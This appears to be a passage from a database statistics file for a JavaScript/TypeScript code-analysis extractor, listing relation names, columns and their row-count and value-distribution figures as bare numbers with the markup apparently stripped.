+6603 + + + + + + + + +local_type_names +23565 + + +id +23565 + + +name +6080 + + +scope +1614 + + + + +id +name + + +12 + + +1 +2 +23565 + + + + + + +id +scope + + +12 + + +1 +2 +23565 + + + + + + +name +id + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +name +scope + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +scope +id + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + +scope +name + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + + + +local_namespace_names +20832 + + +id +20832 + + +name +4078 + + +scope +1543 + + + + +id +name + + +12 + + +1 +2 +20832 + + + + + + +id +scope + + +12 + + +1 +2 +20832 + + + + + + +name +id + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +name +scope + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +scope +id + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + +scope +name + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + + + +is_arguments_object +116243 + + +id +116243 + + + + + +bind +1295408 + + +id +1295408 + + +decl +224900 + + + + +id +decl + + +12 + + +1 +2 +1295408 + + + + + + +decl +id + + +12 + + +1 +2 +81789 + + +2 +3 +50824 + + +3 +4 +29919 + + +4 +5 +17755 + + +5 +7 +16901 + + +7 +14 +17790 + + +14 +98305 +9922 + + + + + + + + +decl +250257 + + +id +250257 + + +decl +246998 + + + + +id +decl + + +12 + + +1 +2 +250257 + + + + + + +decl +id + + +12 + + +1 +2 +245772 + + +2 +283 +1226 + + + + + + + + +typebind +36216 + + +id +36216 + + +decl +12650 + + + + +id +decl + + +12 + + +1 +2 +36216 + + + + + + +decl +id + + +12 + + +1 +2 +6781 + + +2 +3 +2435 + + +3 +4 +1133 + + +4 +6 +1127 + + +6 +17 +954 + + +17 +524 +220 + + + + + + + + +typedecl +23573 + + +id +23573 + + +decl +23565 + + + + +id +decl + + +12 + + +1 +2 +23573 + + + + + + +decl +id + + +12 + + +1 +2 +23558 + + +2 +4 +7 + + + + + + + + +namespacedecl +20839 + + +id +20839 + + +decl +20832 + + + + +id +decl + + +12 + + +1 +2 +20839 + + + + + + +decl +id + + +12 + + +1 +2 +20828 + + +2 +5 +4 + + + + + + + + +namespacebind +4300 + + +id +4300 + + +decl +485 + + + + +id +decl + + +12 + + +1 +2 +4300 + + + + + + +decl +id + + +12 + + +1 +2 +133 + + +2 +3 +46 + + +3 +4 +56 + + +4 +5 +30 + + +5 +7 +37 + + +7 +9 +44 + + +9 +12 +41 + + +12 +17 +38 + + +17 +31 +37 + + +32 +287 +23 + + + + + + + + +properties +id +142723 + + +id +142723 + + +parent +45129 + + +index +4204 + + +kind +3 + + +tostring +67703 + + + + +id +parent + + +12 + + +1 +2 +142723 + + + + + + +id +index + + +12 + + +1 +2 +142723 + + + + + + +id +kind + + +12 + + +1 +2 +142723 + + + + + + +id +tostring + + +12 + + +1 +2 +142723 + + + + + + +parent +id + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +index + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +kind + + +12 + + +1 +2 +44603 + + +2 +4 +526 + + + + + + +parent +tostring + + +12 + + +1 +2 +15770 + + +2 +3 +17763 + + +3 +4 +4692 + + +4 +6 +3759 + + +6 +4173 +3145 + + + + + + +index +id + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +parent + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +kind + + +12 + + +1 +2 +4149 + + +2 +4 +55 + + + + + + +index +tostring + + +12 + + +1 +2 +2827 + + +2 +3 +364 + + +3 +5 +358 + + +5 +7 +337 + + +7 +6233 +316 + + +16744 +16747 +2 + + + + + + +kind +id + + +12 + + +338 +339 +1 + + +1529 +1530 +1 + + +140856 +140857 +1 + + + + + + +kind +parent + + +12 + + +204 +205 +1 + + +523 +524 +1 + + +45034 +45035 +1 + + + + + + +kind +index + + +12 + + +36 +37 +1 + + +55 +56 +1 + + +4204 +4205 +1 + + + + + + +kind +tostring + + +12 + + +174 +175 +1 + + +880 +881 +1 + + +66649 +66650 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +46301 + + +2 +3 +13295 + + +3 +6 +5112 + + +6 +2975 +2995 + + + + + + +tostring +parent + + +12 + + +1 +2 +46926 + + +2 +3 +13013 + + +3 +7 +5466 + + +7 +2975 +2298 + + + + + + +tostring +index + + +12 + + +1 +2 +61480 + + +2 +4 +5275 + + +4 +43 +948 + + + + + + +tostring +kind + + +12 + + +1 +2 +67703 + + + + + + + + +is_computed +27 + + +id +27 + + + + + +is_method +392 + + +id +392 + + + + + +is_static +36 + + +id +36 + + + + + +type_alias +1386 + + +aliasType +1386 + + +underlyingType +1361 + + + + +underlyingType +aliasType + + +12 + + +1 +2 +1 + + + + + + +aliasType +underlyingType + + +12 + + +1 +2 +1 + + + + + + + + +type_literal_value +31882 + + +typ +31882 + + +value +31828 + + + + +typ +value + + +12 + + +1 +2 +31882 + + + + + + +value +typ + + +12 + + +1 +2 +31774 + + +2 +3 +54 + + + + + + + + +signature_types +46921 + + +id +46921 + + +kind +2 + + +tostring +27460 + + +type_parameters +11 + + +required_params +22 + + + + +id +kind + + +12 + + +1 +2 +46921 + + + + + + +id +tostring + + +12 + + +1 +2 +46921 + + + + + + +id +type_parameters + + +12 + + +1 +2 +46921 + + + + + + +id +required_params + + +12 + + +1 +2 +46921 + + + + + + +kind +id + + +12 + + +2639 +2640 +1 + + +44282 +44283 +1 + + + + + + +kind +tostring + + +12 + + +2200 +2201 +1 + + +25260 +25261 +1 + + + + + + +kind +type_parameters + + +12 + + +4 +5 +1 + + +11 +12 +1 + + + + + + +kind +required_params + + +12 + + +18 +19 +1 + + +19 +20 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22069 + + +2 +3 +3061 + + +3 +13 +2112 + + +13 +277 +218 + + + + + + +tostring +kind + + +12 + + +1 +2 +27460 + + + + + + +tostring +type_parameters + + +12 + + +1 +2 +27459 + + +2 +3 +1 + + + + + + +tostring +required_params + + +12 + + +1 +2 +27134 + + +2 +10 +326 + + + + + + +type_parameters +id + + +12 + + +1 +2 +1 + + +13 +14 +1 + + +25 +26 +1 + + +34 +35 +1 + + +42 +43 +1 + + +51 +52 +1 + + +74 +75 +1 + + +139 +140 +1 + + +274 +275 +1 + + +5367 +5368 +1 + + +40901 +40902 +1 + + + + + + +type_parameters +kind + + +12 + + +1 +2 +7 + + +2 +3 +4 + + + + + + +type_parameters +tostring + + +12 + + +1 +2 +1 + + +5 +6 +1 + + +6 +7 +2 + + +8 +9 +2 + + +17 +18 +1 + + +18 +19 +1 + + +158 +159 +1 + + +1805 +1806 +1 + + +25429 +25430 +1 + + + + + + +type_parameters +required_params + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +2 + + +7 +8 +1 + + +8 +9 +2 + + +9 +10 +1 + + +22 +23 +1 + + + + + + +required_params +id + + +12 + + +1 +2 +4 + + +2 +3 +2 + + +3 +5 +2 + + +5 +11 +2 + + +11 +12 +2 + + +44 +131 +2 + + +197 +373 +2 + + +645 +2439 +2 + + +2783 +6853 +2 + + +16407 +17002 +2 + + + + + + +required_params +kind + + +12 + + +1 +2 +7 + + +2 +3 +15 + + + + + + +required_params +tostring + + +12 + + +1 +2 +4 + + +2 +3 +3 + + +4 +5 +1 + + +5 +6 +2 + + +9 +12 +2 + + +39 +62 +2 + + +112 +205 +2 + + +432 +1404 +2 + + +1813 +3662 +2 + + +8431 +11659 +2 + + + + + + +required_params +type_parameters + + +12 + + +1 +2 +12 + + +2 +3 +1 + + +3 +4 +2 + + +5 +7 +2 + + +8 +10 +2 + + +10 +11 +2 + + +11 +12 +1 + + + + + + + + +is_abstract_signature +12 + + +sig +12 + + + + + +signature_rest_parameter +19521 + + +sig +19521 + + +rest_param_arra_type +14259 + + + + +rest_param_arra_type +sig + + +12 + + +1 +2 +1 + + + + + + +sig +rest_param_arra_type + + +12 + + +1 +2 +1 + + + + + + + + +type_contains_signature +87640 + + +typ +68964 + + +kind +2 + + +index +247 + + +sig +37344 + + + + +typ +kind + + +12 + + +1 +2 +68938 + + +2 +3 +26 + + + + + + +typ +index + + +12 + + +1 +2 +59150 + + +2 +3 +5394 + + +3 +248 +4420 + + + + + + +typ +sig + + +12 + + +1 +2 +60034 + + +2 +3 +4557 + + +3 +248 +4373 + + + + + + +kind +typ + + +12 + + +2582 +2583 +1 + + +66408 +66409 +1 + + + + + + +kind +index + + +12 + + +6 +7 +1 + + +247 +248 +1 + + + + + + +kind +sig + + +12 + + +2646 +2647 +1 + + +34698 +34699 +1 + + + + + + +index +typ + + +12 + + +1 +2 +198 + + +2 +3 +21 + + +3 +265 +19 + + +449 +42171 +9 + + + + + + +index +kind + + +12 + + +1 +2 +241 + + +2 +3 +6 + + + + + + +index +sig + + +12 + + +1 +2 +198 + + +2 +3 +24 + + +3 +90 +19 + + +309 +31688 +6 + + + + + + +sig +typ + + +12 + + +1 +2 +35114 + + +2 +896 +2230 + + + + + + +sig +kind + + +12 + + +1 +2 +37344 + + + + + + +sig +index + + +12 + + +1 +2 +36489 + + +2 +9 +855 + + + + + + + + +signature_contains_type +107012 + + +child +26824 + + +parent +37344 + + +index +21 + + + + +child +parent + + +12 + + +1 +2 +19848 + + +2 +3 +3736 + + +3 +7 +2017 + + +7 +10275 +1223 + + + + + + +child +index + + +12 + + +1 +2 +22572 + + +2 +3 +3289 + + +3 +22 +963 + + + + + + +parent +child + + +12 + + +1 +2 +3594 + + +2 +3 +18463 + + +3 +4 +10057 + + +4 +5 +3906 + + +5 +11 +1324 + + + + + + +parent +index + + +12 + + +1 +2 +2649 + + +2 +3 +14810 + + +3 +4 +12007 + + +4 +5 +4294 + + +5 +8 +3055 + + +8 +22 +529 + + + + + + +index +child + + +12 + + +1 +2 +2 + + +2 +3 +6 + + +3 +4 +1 + + +5 +6 +1 + + +9 +10 +1 + + +18 +19 +1 + + +106 +107 +1 + + +313 +314 +1 + + +455 +456 +1 + + +643 +644 +1 + + +1088 +1089 +1 + + +2051 +2052 +1 + + +6862 +6863 +1 + + +8789 +8790 +1 + + +12289 +12290 +1 + + + + + + +index +parent + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + +37344 +37345 +1 + + + + + + + + +signature_parameter_name +69668 + + +sig +34695 + + +index +20 + + +name +4071 + + + + +sig +index + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +sig +name + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +index +sig + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + + + + + +index +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +2 + + +11 +12 +1 + + +16 +17 +1 + + +18 +19 +1 + + +24 +25 +1 + + +30 +31 +1 + + +45 +46 +1 + + +63 +64 +1 + + +116 +117 +1 + + +188 +189 +1 + + +344 +345 +1 + + +605 +606 +1 + + +1092 +1093 +1 + + +1741 +1742 +1 + + +2122 +2123 +1 + + + + + + +name +sig + + +12 + + +1 +2 +1898 + + +2 +3 +700 + + +3 +4 +294 + + +4 +5 +262 + + +5 +8 +310 + + +8 +24 +309 + + +24 +3588 +298 + + + + + + +name +index + + +12 + + +1 +2 +2804 + + +2 +3 +738 + + +3 +4 +290 + + +4 +15 +239 + + + + + + + + +number_index_type +2038 + + +baseType +2038 + + +propertyType +517 + + + + +baseType +propertyType + + +12 + + +1 +2 +2038 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +435 + + +2 +3 +70 + + +3 +1259 +12 + + + + + + + + +string_index_type +1102 + + +baseType +1102 + + +propertyType +256 + + + + +baseType +propertyType + + +12 + + +1 +2 +1102 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +219 + + +2 +3 +20 + + +3 +436 +17 + + + + + + + + +base_type_names +941 + + +typeName +928 + + +baseTypeName +369 + + + + +typeName +baseTypeName + + +12 + + +1 +2 +917 + + +2 +4 +11 + + + + + + +baseTypeName +typeName + + +12 + + +1 +2 +175 + + +2 +3 +101 + + +3 +4 +29 + + +4 +5 +29 + + +5 +11 +28 + + +15 +41 +7 + + + + + + + + +self_types +19632 + + +typeName +14119 + + +selfType +19632 + + + + +typeName +selfType + + +12 + + +1 +2 +10451 + + +2 +3 +1823 + + +3 +4 +1845 + + + + + + +selfType +typeName + + +12 + + +1 +2 +19632 + + + + + + + + +tuple_type_min_length +241 + + +typ +241 + + +minLength +10 + + + + +typ +minLength + + +12 + + +1 +2 +241 + + + + + + +minLength +typ + + +12 + + +2 +3 +3 + + +3 +4 +1 + + +4 +5 +1 + + +7 +8 +1 + + +20 +21 +1 + + +42 +43 +1 + + +66 +67 +1 + + +93 +94 +1 + + + + + + + + +tuple_type_rest_index +6 + + +typ +6 + + +index +2 + + + + +typ +index + + +12 + + +1 +2 +6 + + + + + + +index +typ + + +12 + + +1 +2 +1 + + +5 +6 +1 + + + + + + + + +comments +id +104947 + + +id +104947 + + +kind +5 + + +toplevel +4497 + + +text +73454 + + +tostring +57955 + + + + +id +kind + + +12 + + +1 +2 +104947 + + + + + + +id +toplevel + + +12 + + +1 +2 +104947 + + + + + + +id +text + + +12 + + +1 +2 +104947 + + + + + + +id +tostring + + +12 + + +1 +2 +104947 + + + + + + +kind +id + + +12 + + +1 +2 +2 + + +8834 +8835 +1 + + +19270 +19271 +1 + + +76841 +76842 +1 + + + + + + +kind +toplevel + + +12 + + +1 +2 +2 + + +1705 +1706 +1 + + +3107 +3108 +1 + + +3141 +3142 +1 + + + + + + +kind +text + + +12 + + +1 +2 +2 + + +4893 +4894 +1 + + +12759 +12760 +1 + + +55810 +55811 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +2 + + +1739 +1740 +1 + + +2536 +2537 +1 + + +53678 +53679 +1 + + + + + + +toplevel +id + + +12 + + +1 +2 +1034 + + +2 +3 +512 + + +3 +4 +332 + + +4 +5 +260 + + +5 +7 +388 + + +7 +10 +401 + + +10 +14 +354 + + +14 +21 +365 + + +21 +36 +338 + + +36 +99 +339 + + +99 +6350 +174 + + + + + + +toplevel +kind + + +12 + + +1 +2 +1856 + + +2 +3 +1824 + + +3 +4 +817 + + + + + + +toplevel +text + + +12 + + +1 +2 +1043 + + +2 +3 +533 + + +3 +4 +341 + + +4 +5 +266 + + +5 +7 +396 + + +7 +9 +315 + + +9 +13 +388 + + +13 +20 +385 + + +20 +35 +344 + + +35 +103 +344 + + +103 +4413 +142 + + + + + + +toplevel +tostring + + +12 + + +1 +2 +1054 + + +2 +3 +571 + + +3 +4 +374 + + +4 +5 +297 + + +5 +6 +232 + + +6 +8 +363 + + +8 +11 +345 + + +11 +16 +366 + + +16 +27 +352 + + +27 +60 +338 + + +60 +4394 +205 + + + + + + +text +id + + +12 + + +1 +2 +59626 + + +2 +3 +10314 + + +3 +1417 +3514 + + + + + + +text +kind + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +text +toplevel + + +12 + + +1 +2 +62696 + + +2 +3 +8455 + + +3 +257 +2303 + + + + + + +text +tostring + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +tostring +id + + +12 + + +1 +2 +44781 + + +2 +3 +9203 + + +3 +4589 +3971 + + + + + + +tostring +kind + + +12 + + +1 +2 +57955 + + + + + + +tostring +toplevel + + +12 + + +1 +2 +48252 + + +2 +3 +7233 + + +3 +513 +2470 + + + + + + +tostring +text + + +12 + + +1 +2 +55262 + + +2 +3403 +2693 + + + + + + + + +types +179398 + + +id +179398 + + +kind +9 + + +tostring +40918 + + + + +id +kind + + +12 + + +1 +2 +179398 + + + + + + +id +tostring + + +12 + + +1 +2 +179398 + + + + + + +kind +id + + +12 + + +1 +2 +5 + + +1802 +1803 +1 + + +6109 +6110 +1 + + +12383 +12384 +1 + + +159099 +159100 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +50 +51 +1 + + +745 +746 +1 + + +7464 +7465 +1 + + +32936 +32937 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22482 + + +2 +3 +8025 + + +3 +4 +3362 + + +4 +7 +3387 + + +7 +33 +3070 + + +33 +7284 +592 + + + + + + +tostring +kind + + +12 + + +1 +2 +40638 + + +2 +4 +280 + + + + + + + + +type_child +17410 + + +child +9118 + + +parent +7772 + + +idx +296 + + + + +child +parent + + +12 + + +1 +2 +7113 + + +2 +3 +978 + + +3 +8 +686 + + +8 +199 +341 + + + + + + +child +idx + + +12 + + +1 +2 +8255 + + +2 +5 +726 + + +5 +19 +137 + + + + + + +parent +child + + +12 + + +1 +2 +5433 + + +2 +3 +1746 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +parent +idx + + +12 + + +1 +2 +5422 + + +2 +3 +1757 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +idx +child + + +12 + + +1 +2 +1 + + +2 +3 +39 + + +3 +4 +3 + + +4 +5 +61 + + +5 +6 +37 + + +6 +7 +56 + + +7 +12 +22 + + +12 +14 +18 + + +14 +15 +44 + + +17 +6068 +15 + + + + + + +idx +parent + + +12 + + +2 +15 +13 + + +15 +16 +90 + + +19 +20 +81 + + +20 +23 +3 + + +23 +24 +75 + + +24 +55 +23 + + +55 +7773 +11 + + + + + + + + +ast_node_type +1261889 + + +node +1261889 + + +typ +72602 + + + + +node +typ + + +12 + + +1 +2 +1261889 + + + + + + +typ +node + + +12 + + +1 +2 +39248 + + +2 +3 +8371 + + +3 +4 +7888 + + +4 +5 +3053 + + +5 +8 +6417 + + +8 +28 +5528 + + +28 +588233 +2097 + + + + + + + + +declared_function_signature +62664 + + +node +62664 + + +sig +21731 + + + + +node +sig + + +12 + + +1 +2 +62664 + + + + + + +sig +node + + +12 + + +1 +2 +16826 + + +2 +3 +2358 + + +3 +6 +1683 + + +6 +10251 +864 + + + + + + + + +invoke_expr_signature +140668 + + +node +140668 + + +sig +9111 + + + + +node +sig + + +12 + + +1 +2 +140668 + + + + + + +sig +node + + +12 + + +1 +2 +4612 + + +2 +3 +1819 + + +3 +4 +737 + + +4 +6 +696 + + +6 +14 +705 + + +14 +68351 +542 + + + + + + + + +invoke_expr_overload_index +73550 + + +node +73550 + + +index +47 + + + + +node +index + + +12 + + +1 +2 +73550 + + + + + + +index +node + + +12 + + +1 +2 +17 + + +2 +3 +7 + + +3 +5 +4 + + +5 +6 +4 + + +6 +8 +3 + + +8 +16 +4 + + +27 +155 +4 + + +211 +68535 +4 + + + + + + + + +symbols +10192 + + +id +10192 + + +kind +3 + + +name +7872 + + + + +id +kind + + +12 + + +1 +2 +10192 + + + + + + +id +name + + +12 + + +1 +2 +10192 + + + + + + +kind +id + + +12 + + +584 +585 +1 + + +2385 +2386 +1 + + +7223 +7224 +1 + + + + + + +kind +name + + +12 + + +30 +31 +1 + + +2385 +2386 +1 + + +5609 +5610 +1 + + + + + + +name +id + + +12 + + +1 +2 +6929 + + +2 +3 +533 + + +3 +273 +410 + + + + + + +name +kind + + +12 + + +1 +2 +7730 + + +2 +4 +142 + + + + + + + + +symbol_parent +7807 + + +symbol +7807 + + +parent +1727 + + + + +symbol +parent + + +12 + + +1 +2 +7807 + + + + + + +parent +symbol + + +12 + + +1 +2 +778 + + +2 +3 +304 + + +3 +4 +212 + + +4 +5 +111 + + +5 +8 +152 + + +8 +26 +136 + + +26 +297 +34 + + + + + + + + +symbol_module +100 + + +symbol +97 + + +moduleName +98 + + + + +symbol +moduleName + + +12 + + +1 +2 +95 + + +2 +4 +2 + + + + + + +moduleName +symbol + + +12 + + +1 +2 +96 + + +2 +3 +2 + + + + + + + + +symbol_global +354 + + +symbol +354 + + +globalName +350 + + + + +symbol +globalName + + +12 + + +1 +2 +354 + + + + + + +globalName +symbol + + +12 + + +1 +2 +347 + + +2 +4 +3 + + + + + + + + +ast_node_symbol +8173 + + +node +8173 + + +symbol +8155 + + + + +node +symbol + + +12 + + +1 +2 +8173 + + + + + + +symbol +node + + +12 + + +1 +2 +8147 + + +2 +12 +8 + + + + + + + + +type_symbol +12383 + + +typ +12383 + + +symbol +6743 + + + + +typ +symbol + + +12 + + +1 +2 +12383 + + + + + + +symbol +typ + + +12 + + +1 +2 +6240 + + +2 +3070 +503 + + + + + + + + +type_property +331170 + + +typ +49305 + + +name +22420 + + +propertyType +130857 + + + + +typ +name + + +12 + + +1 +2 +10275 + + +2 +3 +14770 + + +3 +4 +6020 + + +4 +5 +3153 + + +5 +6 +1700 + + +6 +7 +4257 + + +7 +19 +3783 + + +19 +23 +3833 + + +23 +1390 +1514 + + + + + + +typ +propertyType + + +12 + + +1 +2 +19351 + + +2 +3 +10786 + + +3 +4 +5073 + + +4 +6 +2639 + + +6 +7 +3864 + + +7 +22 +3334 + + +22 +33 +3710 + + +33 +1390 +548 + + + + + + +name +typ + + +12 + + +1 +2 +4735 + + +2 +3 +7379 + + +3 +4 +2728 + + +4 +5 +1467 + + +5 +7 +1481 + + +7 +11 +1878 + + +11 +30 +1682 + + +30 +7825 +1070 + + + + + + +name +propertyType + + +12 + + +1 +2 +14690 + + +2 +3 +2698 + + +3 +4 +1925 + + +4 +8 +1697 + + +8 +3373 +1410 + + + + + + +propertyType +typ + + +12 + + +1 +2 +112801 + + +2 +3 +12999 + + +3 +19440 +5057 + + + + + + +propertyType +name + + +12 + + +1 +2 +129508 + + +2 +3475 +1349 + + + + + + + + +lines +id +1622184 + + +id +1622184 + + +toplevel +5312 + + +text +648122 + + +terminator +6 + + + + +id +toplevel + + +12 + + +1 +2 +1622184 + + + + + + +id +text + + +12 + + +1 +2 +1622184 + + + + + + +id +terminator + + +12 + + +1 +2 +1622184 + + + + + + +toplevel +id + + +12 + + +1 +12 +425 + + +12 +24 +415 + + +24 +37 +419 + + +37 +50 +404 + + +50 +66 +411 + + +66 +85 +400 + + +85 +108 +405 + + +108 +138 +402 + + +138 +174 +402 + + +174 +232 +405 + + +232 +331 +399 + + +331 +547 +399 + + +548 +4700 +399 + + +4783 +277404 +27 + + + + + + +toplevel +text + + +12 + + +1 +11 +441 + + +11 +21 +427 + + +21 +30 +414 + + +30 +40 +452 + + +40 +51 +435 + + +51 +64 +413 + + +64 +79 +404 + + +79 +96 +401 + + +96 +121 +400 + + +121 +158 +401 + + +158 +220 +399 + + +220 +387 +401 + + +388 +60934 +324 + + + + + + +toplevel +terminator + + +12 + + +1 +2 +5046 + + +2 +6 +266 + + + + + + +text +id + + +12 + + +1 +2 +513961 + + +2 +3 +84265 + + +3 +49 +48993 + + +49 +175121 +903 + + + + + + +text +toplevel + + +12 + + +1 +2 +569267 + + +2 +3 +56143 + + +3 +5068 +22712 + + + + + + +text +terminator + + +12 + + +1 +2 +647931 + + +2 +4 +191 + + + + + + +terminator +id + + +12 + + +3 +4 +3 + + +349 +350 +1 + + +1830 +1831 +1 + + +1619996 +1619997 +1 + + + + + + +terminator +toplevel + + +12 + + +3 +4 +3 + + +11 +12 +1 + + +349 +350 +1 + + +5218 +5219 +1 + + + + + + +terminator +text + + +12 + + +1 +2 +3 + + +110 +111 +1 + + +1093 +1094 +1 + + +647111 +647112 +1 + + + + + + + + +indentation +1145010 + + +file +5728 + + +lineno +40788 + + +indentChar +2 + + +indentDepth +72 + + + + +file +lineno + + +12 + + +1 +9 +440 + + +9 +18 +471 + + +18 +29 +439 + + +29 +41 +451 + + +41 +54 +460 + + +54 +71 +442 + + +71 +91 +441 + + +91 +118 +430 + + +118 +152 +432 + + +152 +205 +434 + + +205 +295 +431 + + +295 +503 +430 + + +503 +38151 +427 + + + + + + +file +indentChar + + +12 + + +1 +2 +5692 + + +2 +3 +36 + + + + + + +file +indentDepth + + +12 + + +1 +2 +287 + + +2 +3 +401 + + +3 +4 +665 + + +4 +5 +815 + + +5 +6 +814 + + +6 +7 +687 + + +7 +8 +567 + + +8 +9 +390 + + +9 +11 +503 + + +11 +17 +462 + + +17 +67 +137 + + + + + + +lineno +file + + +12 + + +1 +2 +10935 + + +2 +3 +5303 + + +3 +4 +12061 + + +4 +6 +3644 + + +6 +13 +3223 + + +13 +31 +3090 + + +31 +3986 +2532 + + + + + + +lineno +indentChar + + +12 + + +1 +2 +38720 + + +2 +3 +2068 + + + + + + +lineno +indentDepth + + +12 + + +1 +2 +11626 + + +2 +3 +7847 + + +3 +4 +10434 + + +4 +5 +2688 + + +5 +8 +3316 + + +8 +13 +3144 + + +13 +39 +1733 + + + + + + +indentChar +file + + +12 + + +42 +43 +1 + + +5722 +5723 +1 + + + + + + +indentChar +lineno + + +12 + + +2068 +2069 +1 + + +40788 +40789 +1 + + + + + + +indentChar +indentDepth + + +12 + + +10 +11 +1 + + +72 +73 +1 + + + + + + +indentDepth +file + + +12 + + +1 +6 +6 + + +6 +9 +6 + + +9 +20 +6 + + +21 +30 +6 + + +38 +57 +6 + + +59 +90 +6 + + +90 +124 +6 + + +132 +160 +6 + + +165 +211 +6 + + +213 +337 +6 + + +377 +1532 +6 + + +1919 +5487 +6 + + + + + + +indentDepth +lineno + + +12 + + +2 +8 +6 + + +11 +19 +6 + + +25 +44 +6 + + +53 +67 +6 + + +67 +89 +6 + + +102 +169 +6 + + +183 +239 +6 + + +269 +411 +6 + + +417 +971 +6 + + +1129 +2732 +6 + + +4374 +9301 +6 + + +11828 +21226 +6 + + + + + + +indentDepth +indentChar + + +12 + + +1 +2 +62 + + +2 +3 +10 + + + + + + + + +js_parse_errors +3 + + +id +3 + + +toplevel +3 + + +message +1 + + +line +3 + + + + +id +toplevel + + +12 + + +1 +2 +3 + + + + + + +id +message + + +12 + + +1 +2 +3 + + + + + + +id +line + + +12 + + +1 +2 +3 + + + + + + +toplevel +id + + +12 + + +1 +2 +3 + + + + + + +toplevel +message + + +12 + + +1 +2 +3 + + + + + + +toplevel +line + + +12 + + +1 +2 +3 + + + + + + +message +id + + +12 + + +3 +4 +1 + + + + + + +message +toplevel + + +12 + + +3 +4 +1 + + + + + + +message +line + + +12 + + +3 +4 +1 + + + + + + +line +id + + +12 + + +1 +2 +3 + + + + + + +line +toplevel + + +12 + + +1 +2 +3 + + + + + + +line +message + + +12 + + +1 +2 +3 + + + + + + + + +regexpterm +id +33197 + + +id +33197 + + +kind +25 + + +parent +13313 + + +idx +76 + + +tostring +4610 + + + + +id +kind + + +12 + + +1 +2 +33197 + + + + + + +id +parent + + +12 + + +1 +2 +33197 + + + + + + +id +idx + + +12 + + +1 +2 +33197 + + + + + + +id +tostring + + +12 + + +1 +2 +33197 + + + + + + +kind +id + + +12 + + +1 +4 +2 + + +7 +12 +2 + + +12 +16 +2 + + +59 +100 +2 + + +146 +265 +2 + + +445 +479 +2 + + +599 +620 +2 + + +637 +642 +2 + + +826 +1058 +2 + + +1067 +1474 +2 + + +1573 +1693 +2 + + +2613 +3372 +2 + + +15489 +15490 +1 + + + + + + +kind +parent + + +12 + + +1 +4 +2 + + +7 +8 +1 + + +11 +12 +2 + + +15 +46 +2 + + +79 +132 +2 + + +132 +331 +2 + + +367 +381 +2 + + +437 +638 